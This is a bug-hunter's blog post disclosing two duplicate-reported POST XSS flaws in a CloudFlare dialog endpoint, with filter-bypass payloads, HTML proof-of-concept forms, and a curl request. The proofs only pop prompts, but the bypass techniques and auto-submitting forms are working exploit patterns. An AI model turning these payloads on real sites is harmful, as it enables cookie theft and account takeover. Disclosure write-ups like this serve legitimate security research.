XSS in CloudFlare

#1 XSS

These are some of my duplicate vulnerabilities found. I just thought of sharing with you. Recently I found two POST XSS in CloudFlare and unfortunately I was not the first to report.
I found the first issue in the “Confirm Key Generator” dialog box.

View post on imgur.com

Let’s have a closer look at the URL.

/ajax/model-dialog.htm

It seems like an XMLHttpRequest object is used in the server side it accept our POST request.

View post on imgur.com

After playing around with “content=” parameter what I’ve noticed was that it filters all HTML tags except

<b></b> <p></p><A HREF=””> 

Well as <A HREF> tag is not filtered we can easily execute JavaScript.

&lt;A HREF=”javascript:alert(document.cookie);”&gt;XSS&lt;/A&gt;

View post on imgur.com

So the proof of concept would be:

&lt;html&gt;
  &lt;!-- POC by Osanda --&gt;
  &lt;body&gt;
    &lt;form name=&quot;exploit&quot; action=&quot;https://www.cloudflare.com/ajax/modal-dialog.html&quot; method=&quot;POST&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;type&quot; value=&quot;default&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;content&quot; value=&quot;Go&#032;to&#032;this&#032;link&#032;&amp;lt;A&#032;HREF&#061;&amp;quot;javascript&#058;prompt&#040;&amp;apos;XSS&#032;by&#032;Osanda&amp;apos;&#041;&#059;&amp;quot;&amp;gt;XSS&amp;lt;&#047;A&amp;gt;&quot; /&gt;
      &lt;script&gt;document.exploit.submit(); &lt;/script&gt;
    &lt;/form&gt;
  &lt;/body&gt;
&lt;/html&gt;

We don’t need an authorized account to trigger XSS since the issue is in “model-dialog.htm”. Here is the Curl command

curl -i -s -k  -X 'POST' \
    -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Referer: https://www.cloudflare.com/my-account' \
    -b '__cfduid=dcfb031f1436b2c98ee75cfda0b313f9b1395243158470; __utma=1.1850105675.1399902759.1399910158.1400126593.4; __utmz=1.1399902759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=1.7.10.1400126593; __utmc=1; vses2=9pvibldsqecve4b63ef9h13h75; __cf_effload=1' \
    --data-binary $'type=default&amp;content=Go to this link &lt;A HREF=\&quot;javascript:prompt(\'XSS by Osanda\');\&quot;&gt;XSS&lt;/A&gt;' \
    'https://www.cloudflare.com/ajax/modal-dialog.html'

View post on imgur.com


View post on imgur.com



That is it Game Over 🙂

View post on imgur.com


#2 XSS

The second XSS issue was in the “zoneupload” parameter in the “model-dialog.html” file. In the previous scenario all the HTML tags are truncated but in here instead they are converted into special chars. How to bypass this one? 😉

View post on imgur.com


Well as usual “'() are not filtered 🙂

ABC&quot; onmouseover=&quot;prompt('XSS by Osanda') &quot;&quot;

View post on imgur.com



Here is the proof of concept:

&lt;html&gt;
  &lt;body&gt;
    &lt;form action=&quot;https://www.cloudflare.com/ajax/modal-dialog.html&quot; method=&quot;POST&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;type&quot; value=&quot;zoneupload&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;z&quot; value=&quot;google&#046;lk&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;target&quot; value=&quot;ABC&amp;quot;&#032;onmouseover&#061;&amp;quot;prompt&#040;&amp;apos;XSS&#032;by&#032;Osanda&amp;apos;&#041;&#032;&amp;quot;&amp;quot;&quot; /&gt;
      &lt;input type=&quot;submit&quot; value=&quot;Submit request&quot; /&gt;
    &lt;/form&gt;
  &lt;/body&gt;
&lt;/html&gt;

So yeah here we go XSS again 😀

View post on imgur.com



Bug hunting is not all about getting your name in hall of fames or receiving rewards or being the first to report. I just enjoy finding vulnerabilities and love to learn something new 🙂

Advertisements

11 thoughts on “XSS in CloudFlare

  1. dude nice findings, and i like your wallpaper. wanna share?

  2. Thanks for your marvelous posting! I actually enjoyed reading it, you
    could be a great author.I will be sure to
    bookmark your blog and will come back in the foreseeable future.
    I want to encourage continue your great posts, have a nice morning!

Leave a Reply to Evan :) Cancel reply